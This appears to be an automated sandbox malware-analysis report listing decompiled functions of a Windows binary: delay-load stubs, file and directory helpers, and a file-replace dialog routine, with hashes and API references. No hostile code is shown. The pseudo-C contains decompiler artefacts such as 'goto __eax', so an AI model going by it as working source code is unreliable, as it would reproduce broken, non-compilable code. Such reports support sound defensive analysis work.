                                            • Instruction ID: 5fae6b86362bfcf384ee7909c6869da51647b1bab2989a5fdb4a323f00740874
                                            • Opcode Fuzzy Hash: f4b05451a24891b934b2ff6f285e1fc059242c5c37cdbb2d41836326c6d0d7b7
                                            • Instruction Fuzzy Hash: 37B012D5398000AD3129718A6C42E36031CF0C0B28330C12BF007C1044D8C09C001033
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D7DA, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00C4D7DA() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00C4D53A(_t3, _t4, _t8, _t9, _t10, 0xc6abcc, 0xc6deb4); // executed
				goto __eax;
			}








                                            0x00c4d7e4
                                            0x00c4d7ec
                                            0x00c4d7f3

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00C4D7EC
                                              • Part of subcall function 00C4D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C4D5B7
                                              • Part of subcall function 00C4D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C4D5C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                            • String ID:
                                            • API String ID: 1269201914-0
                                            • Opcode ID: 234ae8d1e93ef9c31a202c85d719840a1f3a52547550b559f39cc72a1025e123
                                            • Instruction ID: 8fc86a042abe31c63fce96035de7bad4e048737f42c7bc0d61b72976f2542c3d
                                            • Opcode Fuzzy Hash: 234ae8d1e93ef9c31a202c85d719840a1f3a52547550b559f39cc72a1025e123
                                            • Instruction Fuzzy Hash: 82B012D1398102FE311471016F82C36020CE0D0B1C330802BF003D40849842AC011032
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D1D8, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 22%
                                            			E00C4D1D8() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xc6ab6c); // executed
				E00C4D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                            0x00c4d1b1
                                            0x00c4d1b6
                                            0x00c4d1bd

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00C4D1B6
                                              • Part of subcall function 00C4D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C4D5B7
                                              • Part of subcall function 00C4D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C4D5C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                            • String ID:
                                            • API String ID: 1269201914-0
                                            • Opcode ID: 92b056c73084a28abafbaeee1365acf7ffaf1b37db7e01a53823aed3262f5c46
                                            • Instruction ID: 800f3dbbed44226260d5f7565bb6356ea5aa07e8a44e96f6fa4b225a1eaa98d8
                                            • Opcode Fuzzy Hash: 92b056c73084a28abafbaeee1365acf7ffaf1b37db7e01a53823aed3262f5c46
                                            • Instruction Fuzzy Hash: 18A011E22A8002BC38083202AC82C3A020CE0C0B2833088AAF803C0080A88028002032
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D1EC, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 22%
                                            			E00C4D1EC() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xc6ab6c); // executed
				E00C4D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                            0x00c4d1b1
                                            0x00c4d1b6
                                            0x00c4d1bd

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00C4D1B6
                                              • Part of subcall function 00C4D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C4D5B7
                                              • Part of subcall function 00C4D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C4D5C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                            • String ID:
                                            • API String ID: 1269201914-0
                                            • Opcode ID: f813d686b56403dd2a7420a0d0c75cb264e29ccfb6e2d89dccb11bba3bc815a3
                                            • Instruction ID: 800f3dbbed44226260d5f7565bb6356ea5aa07e8a44e96f6fa4b225a1eaa98d8
                                            • Opcode Fuzzy Hash: f813d686b56403dd2a7420a0d0c75cb264e29ccfb6e2d89dccb11bba3bc815a3
                                            • Instruction Fuzzy Hash: 18A011E22A8002BC38083202AC82C3A020CE0C0B2833088AAF803C0080A88028002032
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D1F6, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 22%
                                            			E00C4D1F6() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xc6ab6c); // executed
				E00C4D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                            0x00c4d1b1
                                            0x00c4d1b6
                                            0x00c4d1bd

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00C4D1B6
                                              • Part of subcall function 00C4D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C4D5B7
                                              • Part of subcall function 00C4D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C4D5C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                            • String ID:
                                            • API String ID: 1269201914-0
                                            • Opcode ID: 0385f8879b34a1b501617acb9ad36fb3d1110d2d70b1fd51bdde7e6fb2fcb893
                                            • Instruction ID: 800f3dbbed44226260d5f7565bb6356ea5aa07e8a44e96f6fa4b225a1eaa98d8
                                            • Opcode Fuzzy Hash: 0385f8879b34a1b501617acb9ad36fb3d1110d2d70b1fd51bdde7e6fb2fcb893
                                            • Instruction Fuzzy Hash: 18A011E22A8002BC38083202AC82C3A020CE0C0B2833088AAF803C0080A88028002032
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D200, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 22%
                                            			E00C4D200() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xc6ab6c); // executed
				E00C4D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                            0x00c4d1b1
                                            0x00c4d1b6
                                            0x00c4d1bd

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00C4D1B6
                                              • Part of subcall function 00C4D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C4D5B7
                                              • Part of subcall function 00C4D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C4D5C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                            • String ID:
                                            • API String ID: 1269201914-0
                                            • Opcode ID: 3cd5ea722046f99ad6fb94eaac7eac7cf18e3695b4a1ff8ae1d05054342ba52e
                                            • Instruction ID: 800f3dbbed44226260d5f7565bb6356ea5aa07e8a44e96f6fa4b225a1eaa98d8
                                            • Opcode Fuzzy Hash: 3cd5ea722046f99ad6fb94eaac7eac7cf18e3695b4a1ff8ae1d05054342ba52e
                                            • Instruction Fuzzy Hash: 18A011E22A8002BC38083202AC82C3A020CE0C0B2833088AAF803C0080A88028002032
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D225, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 22%
                                            			E00C4D225() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xc6ab8c); // executed
				E00C4D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                            0x00c4d212
                                            0x00c4d217
                                            0x00c4d21e

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00C4D217
                                              • Part of subcall function 00C4D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C4D5B7
                                              • Part of subcall function 00C4D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C4D5C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                            • String ID:
                                            • API String ID: 1269201914-0
                                            • Opcode ID: 60f5c6bbc021548db49a9870aeebc5227101ae65d46dccfc442603d5589b46c9
                                            • Instruction ID: d69b39e177331984d92c25a0b54c37572f2eaff2de66662fa06888fd75a2bfc7
                                            • Opcode Fuzzy Hash: 60f5c6bbc021548db49a9870aeebc5227101ae65d46dccfc442603d5589b46c9
                                            • Instruction Fuzzy Hash: 5BA011EA2A8002BC302A3282AC02C3A032CF0C0B28330CA2AF003C0080A880AC002032
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4D22F, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 22%
                                            			E00C4D22F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xc6ab8c); // executed
				E00C4D53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                            0x00c4d212
                                            0x00c4d217
                                            0x00c4d21e

                                            APIs
                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00C4D217
                                              • Part of subcall function 00C4D53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C4D5B7
                                              • Part of subcall function 00C4D53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C4D5C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                            • String ID:
                                            • API String ID: 1269201914-0
                                            • Opcode ID: 74410be8985e8b71fcc9897fe0782abed04018fa6afc130cd3f5846eaf66893c
                                            • Instruction ID: d69b39e177331984d92c25a0b54c37572f2eaff2de66662fa06888fd75a2bfc7
                                            • Opcode Fuzzy Hash: 74410be8985e8b71fcc9897fe0782abed04018fa6afc130cd3f5846eaf66893c
                                            • Instruction Fuzzy Hash: 5BA011EA2A8002BC302A3282AC02C3A032CF0C0B28330CA2AF003C0080A880AC002032
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C39BD6, Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00C39BD6(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
				asm("sbb eax, eax");
				return  ~(_t2 - 1) + 1;
			}




                                            0x00c39bd9
                                            0x00c39be2
                                            0x00c39be5

                                            APIs
                                            • SetEndOfFile.KERNELBASE(?,00C38F33,?,?,-00001960), ref: 00C39BD9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File
                                            • String ID:
                                            • API String ID: 749574446-0
                                            • Opcode ID: 6bac8788b74e16ebd7ca5b476c2103d45e5344adf2ddbc72d2ca818d83516d88
                                            • Instruction ID: bd3869971374e2788c707d9568c2a6b85403daf93521f52e0aeddae82725b976
                                            • Opcode Fuzzy Hash: 6bac8788b74e16ebd7ca5b476c2103d45e5344adf2ddbc72d2ca818d83516d88
                                            • Instruction Fuzzy Hash: 54B011300A880A8A8E202B30CE08A283A22EA2230A30082A0A002CA0A0CB22C003AA00
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C49A8D, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00C49A8D(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
				asm("sbb eax, eax");
				return  ~( ~_t2);
			}




                                            0x00c49a91
                                            0x00c49a99
                                            0x00c49a9d

                                            APIs
                                            • SetCurrentDirectoryW.KERNELBASE(?,00C49CE4,C:\Users\user\Desktop,00000000,00C785FA,00000006), ref: 00C49A91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CurrentDirectory
                                            • String ID:
                                            • API String ID: 1611563598-0
                                            • Opcode ID: f60d08cc694283cd4b8efc32602efa0f93d4536fc632928bba71d58ab7c311a6
                                            • Instruction ID: df4dcfbbabb0606c69ff7bb5272c9b3edb79ad3fceeb5f3f57513d13a237c652
                                            • Opcode Fuzzy Hash: f60d08cc694283cd4b8efc32602efa0f93d4536fc632928bba71d58ab7c311a6
                                            • Instruction Fuzzy Hash: C7A01230198006478A100B30CC09D1D76515761702F008620B202C00A0CB308C10A500
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 00C4AFB9, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289timewindowfileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 60%
                                            			E00C4AFB9(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t73;
				void* _t136;
				long _t137;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				signed short _t148;
				void* _t151;
				intOrPtr _t152;
				signed int _t153;
				signed int _t157;
				struct HWND__* _t159;
				intOrPtr _t162;
				void* _t163;
				int _t166;
				int _t169;
				void* _t173;
				void* _t177;
				void* _t179;

				_t156 = __edx;
				_t151 = __ecx;
				E00C4D940();
				_t148 = _a6748;
				_t162 = _a6744;
				_t159 = _a6740;
				if(E00C312D7(__edx, _t159, _t162, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t163 = _t162 - 0x110;
					if(_t163 == 0) {
						SetFocus(GetDlgItem(_t159, 0x6c));
						E00C3FAB1( &_a2640, _a6752, 0x800);
						E00C3BA19( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t159, 0x65,  &_a2616);
						 *0xc6df00( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t159, 0x66, 0x170, _a1904, 0);
						_t173 = FindFirstFileW( &_a2596,  &_a288);
						if(_t173 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t166 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E00C33E41( &_a900, 0x200, L"%s %s %s", E00C3DA42(_t151, 0x99));
							_t179 = _t177 + 0x18;
							SetDlgItemTextW(_t159, 0x6a,  &_a900);
							FindClose(_t173);
							if((_a308 & 0x00000010) == 0) {
								_push(0x32);
								_push( &_a212);
								_push(0);
								_pop(0);
								asm("adc eax, ebp");
								_push(_a340);
								_push(0 + _a344);
								E00C49D99();
								_push(E00C3DA42(0 + _a344, 0x98));
								E00C33E41( &_a884, 0x200, L"%s %s",  &_a192);
								_t179 = _t179 + 0x14;
								SetDlgItemTextW(_t159, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t159, 0x67, 0x170, _a1928, 0);
							_t152 =  *0xc775f4; // 0x0
							E00C4082F(_t152, _t156,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t166,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E00C33E41( &_a896, 0x200, L"%s %s %s", E00C3DA42(_t152, 0x99));
							_t177 = _t179 + 0x18;
							SetDlgItemTextW(_t159, 0x6b,  &_a896);
							_t153 =  *0xc8ce14;
							_t157 =  *0xc8ce10;
							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
								E00C49D99(_t157, _t153,  &_a212, 0x32);
								_push(E00C3DA42(_t153, 0x98));
								E00C33E41( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t159, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t163 != 1) {
						goto L27;
					}
					_t169 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t169;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t169);
						L13:
						_t137 = SendDlgItemMessageW(_t159, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0xc6df4c(_t137);
						}
						EndDialog(_t159, _t169);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t169 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t169 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}




























                                            0x00c4afb9
                                            0x00c4afb9
                                            0x00c4afbe
                                            0x00c4afc4
                                            0x00c4afcd
                                            0x00c4afd7
                                            0x00c4aff6
                                            0x00c4b000
                                            0x00c4b006
                                            0x00c4b080
                                            0x00c4b09b
                                            0x00c4b0aa
                                            0x00c4b0c0
                                            0x00c4b0dd
                                            0x00c4b0f3
                                            0x00c4b10f
                                            0x00c4b114
                                            0x00c4b127
                                            0x00c4b137
                                            0x00c4b13d
                                            0x00c4b143
                                            0x00c4b144
                                            0x00c4b14a
                                            0x00c4b14d
                                            0x00c4b154
                                            0x00c4b172
                                            0x00c4b17c
                                            0x00c4b184
                                            0x00c4b1a2
                                            0x00c4b1a7
                                            0x00c4b1b5
                                            0x00c4b1b8
                                            0x00c4b1c6
                                            0x00c4b1c8
                                            0x00c4b1da
                                            0x00c4b1e2
                                            0x00c4b1e4
                                            0x00c4b1e5
                                            0x00c4b1e7
                                            0x00c4b1e8
                                            0x00c4b1e9
                                            0x00c4b1f8
                                            0x00c4b213
                                            0x00c4b218
                                            0x00c4b226
                                            0x00c4b226
                                            0x00c4b23c
                                            0x00c4b242
                                            0x00c4b24d
                                            0x00c4b25c
                                            0x00c4b26c
                                            0x00c4b286
                                            0x00c4b29e
                                            0x00c4b2a8
                                            0x00c4b2b0
                                            0x00c4b2cf
                                            0x00c4b2d4
                                            0x00c4b2e2
                                            0x00c4b2ec
                                            0x00c4b2f2
                                            0x00c4b2f8
                                            0x00c4b30c
                                            0x00c4b31b
                                            0x00c4b332
                                            0x00c4b337
                                            0x00c4b345
                                            0x00c4b345
                                            0x00c4b2f8
                                            0x00c4b347
                                            0x00c4b347
                                            0x00c4b349
                                            0x00c4b353
                                            0x00c4b353
                                            0x00c4b00b
                                            0x00000000
                                            0x00000000
                                            0x00c4b016
                                            0x00c4b017
                                            0x00c4b019
                                            0x00c4b03d
                                            0x00c4b03d
                                            0x00c4b03f
                                            0x00c4b03f
                                            0x00c4b040
                                            0x00c4b04a
                                            0x00c4b052
                                            0x00c4b055
                                            0x00c4b055
                                            0x00c4b05d
                                            0x00000000
                                            0x00c4b05d
                                            0x00c4b01b
                                            0x00c4b01e
                                            0x00c4b072
                                            0x00000000
                                            0x00c4b072
                                            0x00c4b020
                                            0x00c4b023
                                            0x00c4b06f
                                            0x00000000
                                            0x00c4b06f
                                            0x00c4b025
                                            0x00c4b028
                                            0x00c4b069
                                            0x00000000
                                            0x00c4b069
                                            0x00c4b02a
                                            0x00c4b02d
                                            0x00000000
                                            0x00000000
                                            0x00c4b02f
                                            0x00c4b032
                                            0x00c4b065
                                            0x00000000
                                            0x00c4b065
                                            0x00c4b037
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c4b037
                                            0x00c4aff8
                                            0x00c4affa
                                            0x00000000

                                            APIs
                                              • Part of subcall function 00C312D7: GetDlgItem.USER32(00000000,00003021), ref: 00C3131B
                                              • Part of subcall function 00C312D7: SetWindowTextW.USER32(00000000,00C622E4), ref: 00C31331
                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00C4B04A
                                            • EndDialog.USER32(?,00000006), ref: 00C4B05D
                                            • GetDlgItem.USER32(?,0000006C), ref: 00C4B079
                                            • SetFocus.USER32(00000000), ref: 00C4B080
                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 00C4B0C0
                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00C4B0F3
                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C4B109
                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C4B127
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C4B137
                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00C4B154
                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00C4B172
                                            • _swprintf.LIBCMT ref: 00C4B1A2
                                              • Part of subcall function 00C33E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C33E54
                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00C4B1B5
                                            • FindClose.KERNEL32(00000000), ref: 00C4B1B8
                                            • _swprintf.LIBCMT ref: 00C4B213
                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 00C4B226
                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00C4B23C
                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00C4B25C
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C4B26C
                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00C4B286
                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00C4B29E
                                            • _swprintf.LIBCMT ref: 00C4B2CF
                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00C4B2E2
                                            • _swprintf.LIBCMT ref: 00C4B332
                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 00C4B345
                                              • Part of subcall function 00C49D99: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00C49DBF
                                              • Part of subcall function 00C49D99: GetNumberFormatW.KERNEL32 ref: 00C49E0E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
